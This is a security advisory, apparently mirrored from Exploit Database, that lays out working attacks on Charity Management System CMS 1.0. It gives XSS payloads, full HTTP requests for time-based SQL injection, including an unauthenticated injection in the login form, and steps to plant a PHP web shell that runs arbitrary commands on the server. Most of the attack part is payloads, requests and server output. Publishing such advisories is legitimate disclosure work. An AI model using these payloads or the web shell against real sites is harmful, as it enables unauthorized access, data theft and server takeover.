Charity Management System CMS 1.0 – Multiple Vulnerabilities

• Exploit Database
• 16 阅读

• 作者： Davide Taraschi
  日期： 2021-08-19
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/50217/

• # Exploit Title: Charity Management System CMS 1.0 - Multiple Vulnerabilities
  # Date: 18/08/2021
  # Exploit Author: Davide 't0rt3ll1n0' Taraschi
  # Vendor Homepage: https://www.sourcecodester.com/users/tips23
  # Software Link: https://www.sourcecodester.com/php/14908/simple-charity-website-management-system-cms-php-free-source-code.htmlpolice-crime-record-management-system.html
  # Version: 1.0
  # Testeted on: Linux (Ubuntu 20.04) using LAMPP
  
  
  ## Unauthenticated reflected XSS
  # Vulnerable code in '/search.php' at line 44/45:
  <?php if($count_all <= 0): ?>
  <h4 class="text-center">No Article with "<?php echo $_GET['search'] ?>" keyword found.</h4> 
  The content of the 'search' variable is printed on the page without being checked, leading to XSS
  # PoC
  Go to 'http://site.com/charity/' and in the search box input "<svg onload=alert(document.domain)>" without the double quotes, and a text box should appear
  
  
  ## Authenticated stored XSS
  There is a stored XSS in '/charity/admin/maintenance/manage_topic.php' due to a failure to sanitize user input
  # Poc
  1) Login as admin
  2) Go to '/maintenance/manage_topic.php'
  3) In "description" insert "<svg onload=alert(document.domain)>" without the double quotes
  4) Click the "save" below
  5) An alert box should appear
  
  
  ## POST Authenticated SQL Injection
  # Vulnerable code in '/charity/classes/Master.php' at line 67
  $del = $this->conn->query("DELETE FROM `topics` where id = '{$id}'");
  The $id variable is used without being checked, leading to SQLi
  # PoC
  Request:
  POST /charity/classes/Master.php?f=delete_topic HTTP/1.1
  Host: localhost
  User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
  Accept: application/json, text/javascript, */*; q=0.01
  Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
  Accept-Encoding: gzip, deflate
  Content-Type: application/x-www-form-urlencoded; charset=UTF-8
  X-Requested-With: XMLHttpRequest
  Content-Length: 4
  Origin: http://localhost
  DNT: 1
  Connection: close
  Referer: http://localhost/charity/admin/?page=maintenance/topics
  Cookie: PHPSESSID=de17186191c1cbdeb6e815ea8c21103f
  Sec-Fetch-Dest: empty
  Sec-Fetch-Mode: cors
  Sec-Fetch-Site: same-origin
  
  id=1' AND (SELECT * FROM (SELECT(SLEEP(5)))foo)-- foo
  
  Response after 5 seconds (the sleep has been executed)
  
  HTTP/1.1 200 OK
  Date: Wed, 18 Aug 2021 14:32:13 GMT
  Server: Apache/2.4.48 (Unix) OpenSSL/1.1.1k PHP/7.4.22 mod_perl/2.0.11 Perl/v5.32.1
  X-Powered-By: PHP/7.4.22
  Expires: Thu, 19 Nov 1981 08:52:00 GMT
  Cache-Control: no-store, no-cache, must-revalidate
  Pragma: no-cache
  Access-Control-Allow-Origin: *
  Content-Length: 20
  Connection: close
  Content-Type: text/html; charset=UTF-8
  
  {"status":"success"}
  
  
  ## GET Authenticated SQL Injection
  # Vulnerable code in '/charity/admin/maintenance/manage_topic.php' at line 2/3
  if(isset($_GET['id']) && $_GET['id'] > 0){
  $qry = $conn->query("SELECT * from `topics` where id = '{$_GET['id']}' ");
  ...
  }
  As usual the 'id' variable is passed to the prepared statement without being checked, leading to (another) SQLi
  # PoC
  Similar to the previous one (same payload)
  
  
  ## POST Unauthenticated SQL Injection
  # Vulnerable code in '/charity/classes/Login.php' at line 21
  $qry = $this->conn->query("SELECT * from users where username = '$username' and password = md5('$password') ");
  The 'username' variable is passed without being sanificated, causing a SQLi
  # PoC
  Request:
  POST /charity/classes/Login.php?f=login HTTP/1.1
  Host: localhost
  User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
  Accept: */*
  Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
  Accept-Encoding: gzip, deflate
  Content-Type: application/x-www-form-urlencoded; charset=UTF-8
  X-Requested-With: XMLHttpRequest
  Content-Length: 84
  Origin: http://localhost
  DNT: 1
  Connection: close
  Referer: http://localhost/charity/admin/login.php
  Cookie: PHPSESSID=de17186191c1cbdeb6e815ea8c21103f
  Sec-Fetch-Dest: empty
  Sec-Fetch-Mode: cors
  Sec-Fetch-Site: same-origin
  
  username=username' AND (SELECT * FROM (SELECT(SLEEP(5)))foo)-- foo&password=password
  
  Response after 5 seconds (the sleep has been executed)
  
  HTTP/1.1 200 OK
  Date: Wed, 18 Aug 2021 14:48:18 GMT
  Server: Apache/2.4.48 (Unix) OpenSSL/1.1.1k PHP/7.4.22 mod_perl/2.0.11 Perl/v5.32.1
  X-Powered-By: PHP/7.4.22
  Expires: Thu, 19 Nov 1981 08:52:00 GMT
  Cache-Control: no-store, no-cache, must-revalidate
  Pragma: no-cache
  Access-Control-Allow-Origin: *
  Content-Length: 164
  Connection: close
  Content-Type: text/html; charset=UTF-8
  
  {"status":"incorrect","last_qry":"SELECT * from users where username = 'username' AND (SELECT * FROM (SELECT(SLEEP(5)))foo)-- foo' and password = md5('password') "}
  
  
  ## PHP Code Injection lead to Authenticated Remote Code Execution (RCE)
  # Vulnerable code in /charity/classes/SystemSettings.php at line 37
  $qry = $this->conn->query("UPDATE system_info set meta_value = '{$value}' where meta_field = '{$key}' ");
  The 'value' variable will be included in the homepage of the site without being checked, leading to RCE.
  # PoC
  1) Go to /charity/admin/system_info.php and in the "Welcome content" click on "Code View" at the top right.
  2) At the bottom of the html code enter the following code: <?php if(isset($_GET['cmd'])) {system($_GET['cmd']);} ?>
  3) Click the "update" button
  4) Go to the home page and at the end of the url tipe "?cmd=$cmd" without the double quotes and replacing $cmd with the command you want to execute
  5) The output should appear in the homepage